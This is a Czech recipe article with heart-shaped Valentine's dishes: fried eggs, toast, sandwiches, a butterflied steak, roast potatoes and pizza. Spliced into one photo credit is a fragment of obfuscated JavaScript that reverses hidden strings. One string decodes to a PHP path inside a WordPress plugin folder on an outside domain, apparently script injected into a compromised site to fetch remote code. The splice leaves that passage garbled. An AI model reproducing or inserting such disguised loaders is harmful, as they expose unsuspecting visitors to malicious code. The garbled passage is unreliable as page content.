FACESTARReceptyLÁSKA PROCHÁZÍ ŽALUDKEM! OBZVLÁŠŤ NA VALENTÝNA!

LÁSKA PROCHÁZÍ ŽALUDKEM! OBZVLÁŠŤ NA VALENTÝNA!

K snídani vajíčka jako srdíčka

K snídani vajíčka jako srdíčka

Vejce jsou vydatná snídaně, která zasytí na velkou část dne. Připravte je tentokrát netradičně ve tvaru srdce. Budete k tomu kromě běžných pomůcek na smažení vajec potřebovat velké vykrajovátko ve tvaru srdce. Na pánev s olejem položte vykrajovátko tupou stranou dolů a do vykrajovátka vyklepněte vajíčko. Většina bílku i žloutek zůstane uvnitř. Přebytečný bílek pak oddělíte a na talíř naservírujete krásné a chutné srdce.

andflickr.com/Lulu

Toust z lásky

Místo vykrajovátka můžete použít krajíc toustového chleba a vykrajovátkem vykrojíte srdce uprostřed. Vejce pak vyklepnete do srdce vykrojeného v chlebu a osmažíte i s chlebem. Vykrojené srdíčko můžete osmažit také.

andflickr.com/hellaOAKLAND

Srdcové sendviče

Odchází vaše polovička na Valentýna brzy ráno do práce? Připravte krabičku plnou chutných srdíček. Opět budete potřebovat toustový chleba a velké vykrajovátko ve tvaru srdce. Vykrajovátkem vykrojíte srdce z krajíčků chleba, plátků šunky a sýra.

andflickr.com/Steven Depolo

Zamilovaný steak

Máte rádi steaky? Připravte na Valentýna steak ve tvaru srdce. Budete potřebovat hovězí svíčkovou – steaky vyřízneme z prostředka. Steak musí být dvakrát širší než obyčejně. Uprostřed pak steak naříznete, jako byste jej chtěli rozříznout na dva, ale nedokrojíte až do konce. Necháte stejně silnou vrstvu masa, jako budou silné obě poloviny steaku. Pak rozříznutý steak otevřete a získáte dvojitý steak ve tvaru srdce. Ten potom připravíte klasickým způsobem podle toho, jaký stupeň propečení preferujete.

and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahandsniff“>flickr.com/scratchandsniff

Postup přípravy steaku:
Steaky musí mít pokojovou teplotu. Maso před vložením na pánev osušíme. Pak jej okořeníme pepřem. Na pánvi rozpálíme 2 lžíce řepkového oleje. Jakmile steak vložíme na pánev, musíme okamžitě ztlumit plamen (žár by měl být zhruba střední) Necháme maso osmahnout asi 3 až 6 minut podle toho, jak je steak silný. Steak otočíme a necháme ještě 2 až 5 minut smažit na pánvi. Pak jej teprve osolíme a vložíme do trouby a „dopékáme“ podle požadovaného stupně propečení.

Srdcová příloha

Opečené brambory jsou výborná příloha nejen ke steaku. I brambory však mohou být ve tvaru srdce. Kromě brambor, soli, oleje na smažení a případně dalšího koření budete potřebovat malé vykrajovátko ve tvaru srdce. Oloupané brambory pokrájíte na plátky a z těch vykrájíte srdíčka. Ta už budete připravovat jako klasické opečené brambory.

Postup přípravy brambor:
Troubu předehřejeme na 200 °C. Plech vyložíme alobalem a vymažeme olejem. Bramborová srdíčka asi 3 minuty povaříme (vložíme je do vroucí vody). Pak brambory promícháme s olejem, solí a dalším kořením podle chuti. Brambory pak rozprostřeme na plech a pečeme asi 20 až 25 minut, v polovině pečení je promícháme a lehce odlepíme z plechu, pokud se připečou. Dáváme pozor, abychom srdíčka nerozbili. Pokud má vaše trouba gril, můžete na posledních pět minut brambory vložit pod gril, aby byly křupavější.
Tip: Brambory můžete servírovat i jako samostatnou chuťovku. Můžete je dochutit např. bylinkami, nebo je připravit pikantnější s cayenským pepřem. Také jsou výborné s česnekem nebo kmínem.

Valentýnská pizza

Pizza je skvělé jídlo pro každou příležitost. Vytvarujte ji tentokrát do tvaru srdce. Těsto na pizzu vytvoříme podle oblíbeného receptu (z droždí, hladké mouky, olivového oleje a soli). Na základ použijeme rajčatovou omáčku s olivami a bazalkou Otma Gurmán Olive & Basilico.

Další ingredience: Čerstvá rajčata, tučnější sýr, pikantní salám, olivy

and

Těsto na pizzu připravíme tak, že rozmícháme droždí ve vlažné vodě a smícháme je s hladkou moukou, olivovým olejem a špetkou soli. Vzniklé těsto rozdělíme na bochánky o váze přibližně čtvrt kila, zabalíme do folie a necháme alespoň 12 hodin odležet v lednici. Plech vymažeme olivovým olejem, odleželé těsto prsty vytáhneme do tvaru srdce a potřeme rajčatovou omáčkou. Ozdobíme nastrouhaným sýrem, plátky čerstvých rajčat, pikantního salámu a nakrájených oliv. Vše zakápneme olivovým olejem a pečeme v předehřáté troubě na maximum. Čas závisí na vlastnostech trouby, okraje těsta musí být upečené do zlatova.

Související články